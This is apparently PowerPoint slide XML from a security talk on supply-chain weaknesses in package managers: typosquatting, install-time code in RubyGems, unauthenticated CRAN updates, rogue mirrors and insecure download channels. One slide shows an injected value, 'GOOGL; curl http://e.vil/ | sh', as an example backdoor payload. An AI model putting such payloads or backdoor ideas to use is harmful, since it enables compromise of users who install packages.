          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authors have not stepped forward to claim credit or provide further details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747" y="3189947"/>
            <a:ext cx="3752507" cy="31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9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NPM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4389120" cy="4302230"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adam Baldwin had access to the logs to see the most common typos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The top had &gt; 20,000 hits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dropped punctuation was the most common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>some-package =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>somepackage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dropped double letters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tree =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tre</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lessons learned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do a little research before just making up package names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typos are everywhere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54" y="2004065"/>
            <a:ext cx="6637446" cy="3706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2326" y="5778631"/>
            <a:ext cx="604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Sharks. Everywhere.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1626553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offerings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455108" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Trusted” modules now a startup model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For the low, low price of $1000/month you too can use Certified modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They check for versioning, tests, coherent metadata, updates, source control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No mention of checks for backdoors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122020"/>
            <a:ext cx="4958856" cy="34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1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790020"/>
            <a:ext cx="5435600" cy="4721225"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="969156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The Ruby Package Manger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642" y="1853166"/>
            <a:ext cx="8067675" cy="41814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25031" y="5114444"/>
            <a:ext cx="3250066" cy="849571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85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The Ruby Package Manger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74" y="2278516"/>
            <a:ext cx="9401611" cy="1716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72" y="1943101"/>
            <a:ext cx="4103914" cy="41039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050754" y="2467188"/>
            <a:ext cx="2792866" cy="5483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62743" y="4452257"/>
            <a:ext cx="554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means it will be much more secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Right?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17133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The Ruby Package Manger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655" y="2030531"/>
            <a:ext cx="634365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03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an email. That’s it. All domains are allowed. Tor is allowed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Email is verified!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22" y="2676979"/>
            <a:ext cx="6139859" cy="340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74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Targeting popular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513407" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>12 gems with &gt; 100 million downloads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350" y="2280740"/>
            <a:ext cx="5612259" cy="404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089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Submitting A Package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a package is similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PyPI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This is an easy process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Packages are small and can have as little as 2-3 small text files in them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once you are ready you run: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You only need to enter your password to login the first time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Package will be immediately visible on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RubyGems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and installable with “gem install”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86" y="3191429"/>
            <a:ext cx="7324632" cy="194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Ruby: Code Execution On Gem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5481073" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code execution on gem install is also trivial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every gem includes a .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gemspec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> configuration file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inside the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gemspec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, simply define an extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extension commands are run immediately on install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97" y="2234512"/>
            <a:ext cx="5437134" cy="3245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34" y="3957038"/>
            <a:ext cx="4983826" cy="2353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76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Stores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220139" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not a new attack, so we will not be covering them further, but extremely prevalent and effective</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Difficult to perform anonymously</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normally stick to legal unwanted actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example, VPN apps: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419" y="1845734"/>
            <a:ext cx="3295650" cy="43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17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Post-Exploit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push a gem or do anything guess what gets saved </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~/.gem/credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Because of course it caches an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> token nearly equivalent to your password. Again,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hundreds of millions of systems, 2FA is nonexistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single arbitrary file read or configuration file leak or backup accidentally left around…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183" y="3857414"/>
            <a:ext cx="9458462" cy="14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The Good Parts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“Hacking With Gems” Benjamin Smith, 2013 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://lanyrd.com/2013/rulu/scgxzr/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discusses many potential attacks if you do install a malicious gem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inspired security proposals for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RubyGems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Signatures are not checked or required by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only 1 of the top 10 gems is signed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58" y="2989214"/>
            <a:ext cx="6257925" cy="581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57" y="3991583"/>
            <a:ext cx="6257925" cy="89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455" y="3009314"/>
            <a:ext cx="6923494" cy="182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106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RubyGems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Signing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030" y="2157274"/>
            <a:ext cx="9456900" cy="325221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8078680" y="4314548"/>
            <a:ext cx="2388093" cy="177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92424" y="4662257"/>
            <a:ext cx="2388093" cy="177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06320" y="5082170"/>
            <a:ext cx="2697331" cy="177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638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72" y="1174441"/>
            <a:ext cx="5782657" cy="44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7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054945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Comprehensive R Archive Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Package manager for the R statistics language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>R is almost certainly the most popular statistical computing and data analysis language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not as many installs as other more well-known general purpose languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So why target R?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Because that’s where the data is!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Packages installed by running (in R):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install.packages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packagename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225" y="1845734"/>
            <a:ext cx="5621568" cy="43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CRAN: Targeting popular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 package has nearly 1 million downloads over 4-5 months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817" y="2462743"/>
            <a:ext cx="4505325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75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CRAN: Package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030837" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manual submission via web form followed by manual review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are 10091 existing packages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Same submission used for updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spot a flaw?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apparently no login/password/token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527" y="1845734"/>
            <a:ext cx="7569101" cy="448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9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CRAN: Replacing popular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37857" cy="4020810"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manual submission via web form apparently allows anyone to submit an update for a popular package</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All the required information is already published (package maintainer’s email, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unclear if any notifications get sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Would need to insert non-obvious vulnerable code/backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: import current stock data -&gt; query stock symbol against your server then, run “curl http://somestocklookupsite/$YOURSTOCKSYMBOL” Looks good until you return </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“GOOGL; curl http://e.vil/ | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” as the stock symbol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plenty of other ideas, invent your own!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But wait, there is a better attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20131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0" y="2009577"/>
            <a:ext cx="9783540" cy="283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21" y="1891636"/>
            <a:ext cx="7640116" cy="3629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90" y="1891636"/>
            <a:ext cx="6130579" cy="424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73" y="1737360"/>
            <a:ext cx="7163812" cy="479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4569" r="23837" b="29288"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3347319" y="2266681"/>
            <a:ext cx="5558320" cy="316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65" y="2123007"/>
            <a:ext cx="4858428" cy="3781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67" y="1888049"/>
            <a:ext cx="7180665" cy="4969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8" y="1871024"/>
            <a:ext cx="7121221" cy="496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19" y="1857310"/>
            <a:ext cx="7141757" cy="494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82" y="1803247"/>
            <a:ext cx="7244229" cy="500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60" y="1719960"/>
            <a:ext cx="7499038" cy="516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72" y="1768623"/>
            <a:ext cx="7353214" cy="508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R and packages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26533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CRAN: Mirrors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37857" cy="4020810"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In contrast with all the other package managers, CRAN relies nearly exclusively on mirrors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mirrors to download the installer, re-select a mirror when downloading packages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Package verification is via MD5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where does it get the MD5 from?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The package zip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Half the mirrors are HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only matters for initial download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTPS mirrors are preferred for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pkgs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does one become a mirror?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17" r="3533"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5159229" y="2731324"/>
            <a:ext cx="6425968" cy="25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4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Kingslayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> breach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Compromised Altair Technologies, and infecting software updates for sysadmin software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hit “five major defense contractors; four major telecommunications providers; 10+ western military organizations; more than two dozen Fortune 500 companies; 24 banks and financial institutions; and at least 45 higher educational institutions” (Krebs)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215" y="3298624"/>
            <a:ext cx="7429121" cy="315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562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CRAN: Mirrors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4"/>
            <a:ext cx="5252942" cy="4020810"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set up a web server with ~200GB free space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and some apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>configs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Come up with a good reason why they should add you</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send an email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Would the project allow hacker scriptjunkie@scriptjunkie.us to host a mirror?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You bet!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(again, I did not alter any packages)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22" y="1845734"/>
            <a:ext cx="5334297" cy="474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11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CRAN: Mirror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447843" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Over 10 days</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>43,733 total packages downloaded by R</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>949 unique IP’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Between 529 and 22,209 downloads per day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nearly 100 unique IP’s per day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mostly US</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Obviously, mirrors are listed by country</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You could set up a mirror in whatever target country you want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689" b="3559"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5662569" y="1809862"/>
            <a:ext cx="5493111" cy="44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531" y="1480007"/>
            <a:ext cx="3130281" cy="461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typosquatting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the wild?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662420" cy="45677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PHP is the most popular server-side web programming language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Composer is the command line tool to pull packages and manage dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Packagist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> repository</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dependencies specified in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>composer.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and installed with “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composer.phar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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One of the most popular PHP packages is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Laravel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (“The PHP Framework For Web Artisans”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Laravel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is obtained via installing "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>laravel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/framework“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>larvel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/framework" is somebody else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious? Maybe no… In-the-wild </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>typosquatting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>? Yes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121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428" y="0"/>
            <a:ext cx="5856103" cy="3304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Package managers and installers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3009514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Homebrew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868514" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“The missing package manager for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>macOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install programs with “brew install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Homebrew installs the stuff you need that Apple didn’t.”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174078"/>
            <a:ext cx="5652075" cy="33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78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Brew Packages (“formulae”)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Submitted via pull request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must be relatively well-established software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ruby code inside the “install”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02" y="3330213"/>
            <a:ext cx="5410955" cy="2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88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Brew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Brew is installed with a terminal command, copy &amp; pasted from brew.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://brew.sh/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UPDATE: in Feb, brew.sh installed an HTTPS cert and auto-redirects. HTTP still default on Google.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3217144"/>
            <a:ext cx="8229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Honorable mention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620" y="2183614"/>
            <a:ext cx="7569719" cy="402272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Chocolatey admins still manually review all packages and updates. We’ll see how long that lasts.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4368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85750"/>
            <a:ext cx="6226968" cy="59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08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143" y="1846263"/>
            <a:ext cx="5214039" cy="402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418" y="1846263"/>
            <a:ext cx="5805488" cy="4838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49" y="1754341"/>
            <a:ext cx="5457825" cy="502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Mint</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340787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Supermicro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Apple breach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0084"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2549561" y="1737360"/>
            <a:ext cx="6680499" cy="451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8" y="4756994"/>
            <a:ext cx="11694907" cy="11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Mint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redirects to mirror selection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>109 download methods on Linux Mint </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> download page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Of those, only 1 is secure (HTTPS); 108 sources are not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>True of other distros?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ubuntu – yes HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SUSE Linux Enterprise – yes HTTP</a:t>
